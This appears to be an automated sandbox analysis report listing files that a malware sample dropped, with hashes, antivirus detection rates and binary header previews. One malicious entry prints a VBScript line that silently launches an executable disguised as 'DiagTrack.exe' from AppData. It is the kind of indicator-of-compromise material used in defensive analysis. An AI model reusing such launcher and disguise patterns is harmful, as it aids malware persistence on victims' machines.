                                                                                                                                                                                                                                              Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):223704
                                                                                                                                                                                                                                              Entropy (8bit):6.478282624362907
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:dWlUVdUEs9Wla/eLOCoTo1txKWT2FEFX0/UMTwTh2OCgazMznRVJogh4ydDeuw42:dWTKa/OtxKcrxaUMWRjDh4C6uTte
                                                                                                                                                                                                                                              MD5:54F4EBCE5C56BF86C5948D89BA8C875F
                                                                                                                                                                                                                                              SHA1:8DA1E1B95CBBA3E9A50BA999D3D1EA64CC2B358E
                                                                                                                                                                                                                                              SHA-256:B4A622D3535BBC64DAB4626BF93482A2983A63F77ACD0AE9B6386F51F736376C
                                                                                                                                                                                                                                              SHA-512:05D8429B28C918F402A246E44C83DEA4C11F01F571D6B72D16337C83395D03FEB8A4D14F5F9E7EAF62DD1621A80CA966B3FF3E026E396EEEDB4FDFBD772A3EA8
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 18%
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%g.....................,.......9... ...@....@.. ....................................`..................................9..S....@...(...........H...!........................................................... ............... ..H............text........ ...................... ..`.rsrc....(...@...*..................@..@.reloc...............F..............@..B.................9......H.......4...d+..............c.......................................................................................................................................................:.(-.....}....*>..(......}....*V..o/....(0.....}....*B...(0.....}....*....(1.....rE..p.....(2...o3........}....*j.rS..p.{....o4......(5...*..{....*....(9...T8......J.XT.J.X(.....(=...-.*"..(....*2.s....(....*J.(....o.....(....*6..s....(....*R..(.....( ....(....*:...s....(....*v...(!....(x.....}.....
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2964480
                                                                                                                                                                                                                                              Entropy (8bit):6.547019304873906
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:49152:3S4JSuBwINPmACNvfBiKKx2ymGdMOqJ97s+Y:xSuBfNOAoxip2FG6OqJ9NY
                                                                                                                                                                                                                                              MD5:53014E825FFABBC0AC8A0AB1AEC76EE7
                                                                                                                                                                                                                                              SHA1:0C81CBA17F60843F4FC34388E6F07EE969E1B056
                                                                                                                                                                                                                                              SHA-256:F018E69934CDBC05BCE5C6DDAF408409C2FBBBE1BD76E7D586221B0FC077FE2B
                                                                                                                                                                                                                                              SHA-512:7DE026C0324A35DFBD273C329AB5EFBA662B71DEEC2AD8D405A55348C4B2AE6492BD3D74C3BF85133184E66AE834A8D3D8CD195ECB047759088B7FFBEF9F4999
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J...........P0...........@...........................0......y-...@.................................T...h.......@........................................................................................................... . .........~..................@....rsrc...@...........................@....idata ............................@...zjitwqld..*.......*.................@...mduizhsw.....@0.......-.............@....taggant.0...P0.."....-.............@...........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2143744
                                                                                                                                                                                                                                              Entropy (8bit):7.959329929023164
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:49152:/gTKihWoN2xC3miqdOlcZsxJmyfTOQxI0UsGzNLNuLbLujD:YTAoN2E4dO+ZuJmybjI0ULuL
                                                                                                                                                                                                                                              MD5:90CD56BFD041977B953EC0D6AC7F665C
                                                                                                                                                                                                                                              SHA1:C0CBD27BA7367C60BA521CE16056A115EE638EB8
                                                                                                                                                                                                                                              SHA-256:1BA20B045D5B1D94525FCF24264305573278D9584ECBB9C897ADCDEFBFE5EEC4
                                                                                                                                                                                                                                              SHA-512:16DD26329B62E1CFCD6B215D5FF0572F2AC0036125DD447FB06AEF929696A5E6BB8FCEF7A5E5711AF993054848301F1CD1A07752A4FEDB61FE5EFAF4B3448BFB
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g......................,...... s...........@..........................Ps.....+.!...@.................................P...d................................................................................................................... . .p.......v..................@....rsrc ............................@....idata ............................@... .`*.........................@...onvelaog......Y.....................@...dkmdjfdj......s....... .............@....taggant.0... s..".... .............@...........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):919552
                                                                                                                                                                                                                                              Entropy (8bit):6.584688480979072
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:zqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDga/T7:zqDEvCTbMWu7rQYlBQcBiT6rprG8ab7
                                                                                                                                                                                                                                              MD5:C1FA8AC639C1D531A4C7CF311C056AB0
                                                                                                                                                                                                                                              SHA1:1D1C137AD8EA08C6ABDC2CFB8E8F7B7F802499BF
                                                                                                                                                                                                                                              SHA-256:E4187B64BC8D91A8413225D696CF1BDCB08905B1698F8922DF19F88EB7314E08
                                                                                                                                                                                                                                              SHA-512:1836E302213E7CD81B456CD8B711AD18DB360BD4D25636BAF4DB97A8893F5DF486B640603DC69B2DAE567F95D0814C306A3FB86376536A9E2F1143603697DFD6
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...0.%g.........."..........X......w.............@..........................`............@...@.......@.....................d...|....@..(........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...(....@......................@..@.reloc...u.......v..................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2866688
                                                                                                                                                                                                                                              Entropy (8bit):6.494213416290658
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:49152:t5ZZQ5qtYXNzHTOl88780cMTwCLKxEnT28f:t5ZZQ5qyXNzHTOl8XMwCLKCnyO
                                                                                                                                                                                                                                              MD5:01DDF9CC770BC558B2FAFFA43B9B5B12
                                                                                                                                                                                                                                              SHA1:41300C4536F0F97182BC08207BE6B7E03200D9A7
                                                                                                                                                                                                                                              SHA-256:FE788A81D8D514B8D5DB059A110090498C4CD6A8CCD77A5D6036AE9E603E06B1
                                                                                                                                                                                                                                              SHA-512:49CF6DF07F468D1531C64041419E3B698AACB7E2C872D3310BA58C3BA5E73CED318946FA9CCFAAC506DF1D9EAE3A6AD91E8D0FB41E43153053B4B8F55BB94468
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 37%
                                                                                                                                                                                                                                              Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$........... ,.. ...`....@.. .......................`,.....E.,...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...krwtsfss.`+......^+..:..............@...qssevqjd. ....,.......+.............@....taggant.@... ,.."....+.............@...................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2866688
                                                                                                                                                                                                                                              Entropy (8bit):6.494213416290658
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:49152:t5ZZQ5qtYXNzHTOl88780cMTwCLKxEnT28f:t5ZZQ5qyXNzHTOl8XMwCLKCnyO
                                                                                                                                                                                                                                              MD5:01DDF9CC770BC558B2FAFFA43B9B5B12
                                                                                                                                                                                                                                              SHA1:41300C4536F0F97182BC08207BE6B7E03200D9A7
                                                                                                                                                                                                                                              SHA-256:FE788A81D8D514B8D5DB059A110090498C4CD6A8CCD77A5D6036AE9E603E06B1
                                                                                                                                                                                                                                              SHA-512:49CF6DF07F468D1531C64041419E3B698AACB7E2C872D3310BA58C3BA5E73CED318946FA9CCFAAC506DF1D9EAE3A6AD91E8D0FB41E43153053B4B8F55BB94468
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 37%
                                                                                                                                                                                                                                              Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$........... ,.. ...`....@.. .......................`,.....E.,...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...krwtsfss.`+......^+..:..............@...qssevqjd. ....,.......+.............@....taggant.@... ,.."....+.............@...................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1894400
                                                                                                                                                                                                                                              Entropy (8bit):7.9488282759970845
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:49152:NEmEI2wiR3hAOyNuf5PLgDQjzq9GnkyPzxJDMY:NEmH2Nhx7fdIdSPlJ4
                                                                                                                                                                                                                                              MD5:1E33E63C356AC4032505C4A3F7157786
                                                                                                                                                                                                                                              SHA1:D269E43D5E8439E0A033B3291963B478308F5934
                                                                                                                                                                                                                                              SHA-256:DC143828ACE64C6A5DE6FD23B99B0B5C73C49F3B1A2A1A585EC356ECD57EAF13
                                                                                                                                                                                                                                              SHA-512:68CBA85D1100B31110D866EDEB66D5066F12AB8E36E1AEAAD78279EDD31A013573FB377F364D9B0492AFF3B0F2DE95CF27DC6779CF14677BC349F4F55D6B04E6
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................K...........@..........................0K.....|.....@.................................W...k.......D.....................J.............................`.J..................................................... . ............................@....rsrc...D...........................@....idata ............................@... .p*.........................@...uqbleicu..... 1.....................@...hvgssyyw......J.....................@....taggant.0....K.."..................@...................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                              Size (bytes):26
                                                                                                                                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                                              Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                              File Type:ISO Media, MP4 Base Media v1 [ISO 14496-12:2003]
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                              Entropy (8bit):0.4593089050301797
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:9SP0nUgwyZXYI65yFRX2D3GNTTfyn0Mk1iA:9SDKaIjo3UzyE1L
                                                                                                                                                                                                                                              MD5:D910AD167F0217587501FDCDB33CC544
                                                                                                                                                                                                                                              SHA1:2F57441CEFDC781011B53C1C5D29AC54835AFC1D
                                                                                                                                                                                                                                              SHA-256:E3699D9404A3FFC1AFF0CA8A3972DC0EF38BDAB927741E9F627C7C55CEA42E81
                                                                                                                                                                                                                                              SHA-512:F1871BF28FF25EE52BDB99C7A80AB715C7CAC164DCD2FD87E681168EE927FD2C5E80E03C91BB638D955A4627213BF575FF4D9EECAEDA7718C128CF2CE8F7CB3D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:... ftypisom....isomiso2avc1mp41....free....mdat..........E...H..,. .#..x264 - core 152 r2851 ba24899 - H.264/MPEG-4 AVC codec - Copyleft 2003-2017 - http://www.videolan.org/x264.html - options: cabac=1 ref=3 deblock=1:0:0 analyse=0x3:0x113 me=hex subme=7 psy=1 psy_rd=1.00:0.00 mixed_ref=1 me_range=16 chroma_me=1 trellis=1 8x8dct=1 cqm=0 deadzone=21,11 fast_pskip=1 chroma_qp_offset=-2 threads=4 lookahead_threads=1 sliced_threads=0 nr=0 decimate=1 interlaced=0 bluray_compat=0 constrained_intra=0 bframes=3 b_pyramid=2 b_adapt=1 b_bias=0 direct=1 weightb=1 open_gop=0 weightp=2 keyint=250 keyint_min=25 scenecut=40 intra_refresh=0 rc_lookahead=40 rc=crf mbtree=1 crf=23.0 qcomp=0.60 qpmin=0 qpmax=69 qpstep=4 ip_ratio=1.40 aq=1:1.00......e...+...s|.kG3...'.u.."...,J.w.~.d\..(K....!.+..;....h....(.T.*...M......0..~L..8..B..A.y..R..,.zBP.';j.@.].w..........c......C=.'f....gI.$^.......m5V.L...{U..%V[....8......B..i..^,....:...,..5.m.%dA....moov...lmvhd...................(...........
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                              Size (bytes):298941256
                                                                                                                                                                                                                                              Entropy (8bit):7.999993269646735
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:6291456:7WhDpASyWtw8QQwaXLIfHGG5rBYqqQ6jHFDnRVZlOcw3jJvsLup:6G8QQj2+qqQ6DF3+c+JkLup
                                                                                                                                                                                                                                              MD5:7CD2BE69E8328859F3F0EA465F7BF035
                                                                                                                                                                                                                                              SHA1:C2FC77098E4E21013D12A5645D1EAC4F15A549E0
                                                                                                                                                                                                                                              SHA-256:E961FF6C8AA0E77659CF19CF0FE23702F9AC3B9C95C205C5B438B111BAEF04ED
                                                                                                                                                                                                                                              SHA-512:D54BF77AB8C643BFA65CEDC8DE828A3CFE5AFD858750B53D4A9B6E904B96A580996B3C25457E7EAA864CA3446E046455D47D94210F1FFC823DF0B72203463783
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%g.....................,.......9... ...@....@.. ....................................`..................................9..S....@...(...........H...!........................................................... ............... ..H............text........ ...................... ..`.rsrc....(...@...*..................@..@.reloc...............F..............@..B.................9......H.......4...d+..............c.......................................................................................................................................................:.(-.....}....*>..(......}....*V..o/....(0.....}....*B...(0.....}....*....(1.....rE..p.....(2...o3........}....*j.rS..p.{....o4......(5...*..{....*....(9...T8......J.XT.J.X(.....(=...-.*"..(....*2.s....(....*J.(....o.....(....*6..s....(....*R..(.....( ....(....*:...s....(....*v...(!....(x.....}.....
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):84
                                                                                                                                                                                                                                              Entropy (8bit):4.777451464543708
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:FER/n0eFHHot+kiEaKC5PCxfkAdAHn:FER/lFHIwknaZ56lTO
                                                                                                                                                                                                                                              MD5:7BC74B11933C7A750D1F0AB30504CAEC
                                                                                                                                                                                                                                              SHA1:AE3ACF7A27075A35FF16B0C32A7998B2A65A859E
                                                                                                                                                                                                                                              SHA-256:58C6A429B04882AD74685934C83819D6034FBD68D2C82315505CDE9F787AF9FF
                                                                                                                                                                                                                                              SHA-512:2388974ECE1F630D7D5B0DA3B1790642E2BAB269C986C160CD9301BBB1CAE3FD3D299991484372147FA7D24207E9FE1188E93BD6C76BF0AF657F61C856BF2963
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\DiagTrack.exe"""
                                                                                                                                                                                                                                              Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                              File Type:SQLite 3.x database, user version 5, last written using SQLite version 3042000, page size 32768, file counter 5, database pages 8, cookie 0x6, schema 4, largest root page 8, UTF-8, vacuum mode 1, version-valid-for 5
                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                              Size (bytes):262144
                                                                                                                                                                                                                                              Entropy (8bit):0.04905391753567332
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:DLivwae+Q8Uu50xj0aWe9LxYkKA25Q5tvAA:D6wae+QtMImelekKDa5
                                                                                                                                                                                                                                              MD5:DD9D28E87ED57D16E65B14501B4E54D1
                                                                                                                                                                                                                                              SHA1:793839B47326441BE2D1336BA9A61C9B948C578D
                                                                                                                                                                                                                                              SHA-256:BB4E6C58C50BD6399ED70468C02B584595C29F010B66F864CD4D6B427FA365BC
                                                                                                                                                                                                                                              SHA-512:A2626F6A3CBADE62E38DA5987729D99830D0C6AA134D4A9E615026A5F18ACBB11A2C3C80917DAD76DA90ED5BAA9B0454D4A3C2DD04436735E78C974BA1D035B1
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j......|....~.}.}z}-|.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                              Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                              MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                              SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                              SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                              SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                              Entropy (8bit):0.035577876577226504
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:GtlstFSI++qboRPSRhlstFSI++qboRPSR2lJ89//alEl:GtWtQIBFQWtQIBFHJ89XuM
                                                                                                                                                                                                                                              MD5:0DDDAA980C77138098F2763E79E8AF2E
                                                                                                                                                                                                                                              SHA1:4F7DC073355A658999068894DC35E2E225153D17
                                                                                                                                                                                                                                              SHA-256:A44EF4AED347653659EA9E7A2B2FDE5A604501635B7140F04A52EB349132DB14
                                                                                                                                                                                                                                              SHA-512:44C0FA3479D89DE0A0112F7AEB9EBDB5F54B6244319F6C2499747B0178EFAE6A6513E6C22352CD92CAD5EAE06C7B82C092A84350C1F28E76CC33531704578D24
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:..-......................3....>}.B.,.c.Sq4...-......................3....>}.B.,.c.Sq4.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                              File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):32824
                                                                                                                                                                                                                                              Entropy (8bit):0.03971446214882193
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Ol1ePA0fuHZl/ofbY9jRP4Dl8rEXsxdwhml8XW3R2:KAI0GHTmYBRQl8dMhm93w
                                                                                                                                                                                                                                              MD5:6DF893E76D77924F591FB99B242BFEF2
                                                                                                                                                                                                                                              SHA1:9063F56336FD9B3C37834420894110E1193FC9C2
                                                                                                                                                                                                                                              SHA-256:A5B8ED4149CE4846804D0FBD2167D383367E4D39DE08AB3793422887F8077157
